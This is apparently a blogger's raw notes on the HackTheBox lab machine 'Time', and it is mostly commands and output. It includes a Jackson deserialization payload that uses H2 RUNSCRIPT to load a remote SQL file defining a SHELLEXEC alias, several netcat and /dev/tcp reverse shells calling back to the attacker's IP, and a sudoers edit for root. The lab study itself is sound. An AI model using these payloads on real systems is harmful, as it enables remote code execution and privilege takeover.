Post

Lab - HackyHour3 - Time

Posted Updated
By Grace L
7 min read

[toc]

time

pic

Machine: Time

Step 1: Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161

nmap -sC -sV 10.129.32.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 00:21 UTC
Nmap scan report for ip-10-129-32-8.ec2.internal (10.129.32.8)
Host is up (0.083s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: No content to map due to end-of-input

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'ture': was expecting 'null', 'true', 'false' or NaN

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'microtaskDebounce': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'w': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'w': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception:
com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT),
expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object



Payload:Validation failed:
Unhandled Java exception:
com.fasterxml.jackson.databind.JsonMappingException: URL format error;
must be "jdbc:h2:{ {.|mem:}[name] | [file:]fileName | {tcp|ssl}:[//]server[:port][,server2[:port]]/name }[;key=value...]"
but is  "jdbc:h2:tcp://10.10.14.50:8989" [90046-199] (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.50/"}]

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.JsonMappingException:
Connection is broken: "java.net.ConnectException: Connection refused (Connection refused): 10.10.14.50" [90067-199] (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])



Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.JsonMappingException:
No suitable driver found for jdbc:tcp://10.10.14.50/ (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.50/"}]

$ nc -vv -l 10.129.32.8 -p 9000


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:tcp://10.129.32.8/"}]"

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('u' (code 117)): was expecting comma to separate Array entries

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('\' (code 92)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')


Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException:
Could not resolve type id 'ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce' as a subtype of [simple type, class java.lang.Object]: no such class found


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:tcp://10.129.32.8/"}]"
# Validation successful!


"["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"





# setup the web page

python -m SimpleHTTPServer 9000 # py2
python3 -m http.server 9000

https://0.0.0.0:9000/


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"
# Validation successful!


"["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# running for long time
# Validation failed: 2020-10-31 01:59:30 command: slow query: 118 ms


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]
# Validation failed: 2020-10-31 01:56:26 lock: 3 shared read lock unlock SYS


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://0.0.0.0:9000/inject.sql'"}]
# Validation failed: 2020-10-31 01:53:53 lock: 3 shared read lock unlock SYS

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://0.0.0.0:9000/inject.sql'"}]"
# Validation successful!

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]"
# Validation successful!


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]
# Validation failed: 2020-10-31 02:09:42 lock: 3 shared read lock unlock SYS


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# CALL SHELLEXEC('nc 10.10.14.50 9000')
# Validation failed: 2020-10-31 02:28:18 command: slow query: 641 ms
# Validation failed: 2020-10-31 02:31:47 command: slow query: 632 ms
# Validation failed: 2020-10-31 02:33:06 command: slow query: 647 ms
# Validation failed: 2020-10-31 02:33:06 command: slow query: 647 ms

# htbox        >  my kali listen on 2424
# 10.129.32.8     10.10.14.50



["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# CALL SHELLEXEC('nc 10.10.14.50 2424 –e /bin/bash')
# CALL SHELLEXEC('nc -e /bin/sh 10.10.14.50 2424')
# host:
# $ nc -vv -l 0.0.0.0 -p 2424
# 0.0.0.0: inverse host lookup failed: Unknown host
# listening on [any] 2424 ...
# invalid connection to [10.10.14.50] from ip-10-129-32-8.ec2.internal [10.129.32.8] 58842
# htb:
# Validation failed: 2020-10-31 02:43:35 lock: 3 exclusive write lock requesting for SYS

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9004/inject.sql'"}]


# be careful for the special character:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]



# inject.sql:
bash -i >& /dev/tcp/10.10.14.50/2424 0>&1


# host:
nc -lvp 2424
listening on [any] 2424 ...
connect to [10.10.14.50] from ip-10-129-32-8.ec2.internal [10.129.32.8] 58866
bash: cannot set terminal process group (960): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$


hashcat -m 1400 -a 0 -o 10790631378d0d5e0d85e40ca7f23a17 /usr/share/wordlists/rockyou.txt


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

require 'java'
Dir["./classpath/*.jar"].each do |f|
    require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

1
2
3
4
5
6
7
8
9
10

-- CREATE ALIAS SHELLEXEC
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
    return s.hasNext() ? s.next() : "";  }
$$;

-- CALL ALIAS SHELLEXEC with iput
-- CALL SHELLEXEC('id > exploited.txt')
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.50/2424 0>&1')

inside the box

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

pericles@time: cd /home/pericles/snap/lxd/current/.config/lxc


pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ cat config.yml
cat config.yml
default-remote: local
remotes:
  images:
    addr: https://images.linuxcontainers.org
    protocol: simplestreams
    public: true
  local:
    addr: unix://
    public: false
aliases: {}

ps fauxwww


pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ lxc remote list
lxc remote list
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
|      NAME       |                   URL                    |   PROTOCOL    |  AUTH TYPE  | PUBLIC | STATIC |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| images          | https://images.linuxcontainers.org       | simplestreams | none        | YES    | NO     |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| local (default) | unix://                                  | lxd           | file access | NO     | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| ubuntu          | https://cloud-images.ubuntu.com/releases | simplestreams | none        | YES    | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| ubuntu-daily    | https://cloud-images.ubuntu.com/daily    | simplestreams | none        | YES    | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+

# reverse version does not work
pericles@time:/home/pericles$ snap revert snap --revision=2.37.1
snap revert snap --revision=2.37.1
error: access denied (try with sudo)



pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ ls -aslh /run/snapd*
</snap/lxd/current/.config/lxc$ ls -aslh /run/snapd*
0 srw-rw-rw- 1 root root  0 Nov  7 00:37 /run/snapd-snap.socket
0 srw-rw-rw- 1 root root  0 Nov  7 00:37 /run/snapd.socket



/run/snapd:
total 0
0 drwxr-xr-x  4 root root  80 Nov  7 00:37 .
0 drwxr-xr-x 27 root root 860 Nov  7 01:34 ..
0 drwxr-xr-x  2 root root  80 Nov  7 00:37 lock
0 drwxr-xr-x  2 root root 100 Nov  7 00:37 ns

right path

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

# long process
$ ps fauxwww
ps faxwxxx
    PID TTY      STAT   TIME COMMAND
      2 ?        S      0:00 [kthreadd]
      3 ?        I<     0:00  \_ [rcu_gp]


# run a script
$ linpeas.sh

[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh


$ cd /usr/bin
total 114572
drwxr-xr-x  2 root     root        36864 Oct 23 06:41 .
drwxr-xr-x 14 root     root         4096 Apr 23  2020 ..
lrwxrwxrwx  1 root     root            4 Feb 17  2020 NF -> col1

$ cd /etc/sudoers.d
total 20
drwxr-xr-x   2 root root 4096 Nov 14 01:38 .
drwxr-xr-x 102 root root 4096 Oct 23 06:44 ..
-r--r-----   1 root root   91 Apr 10  2020 99-snapd.conf
-r--r-----   1 root root  958 Feb  3  2020 README
-rw-r--r--   1 root root   33 Nov 14 01:39 rw

$ touch rw

$ echo "echo 'pericles ALL=(ALL) NOPASSWD: ALL' > etc/sudoers.d/rw" >> /usr/bin/timer_backup.sh

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo 'pericles ALL=(ALL) NOPASSWD: ALL' > etc/sudoers.d/rw


pericles@time:/etc/sudoers.d$ sudo su -
sudo su -
whoami
root

ref

.

Lab, HackTheBox
Lab HackTheBox
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.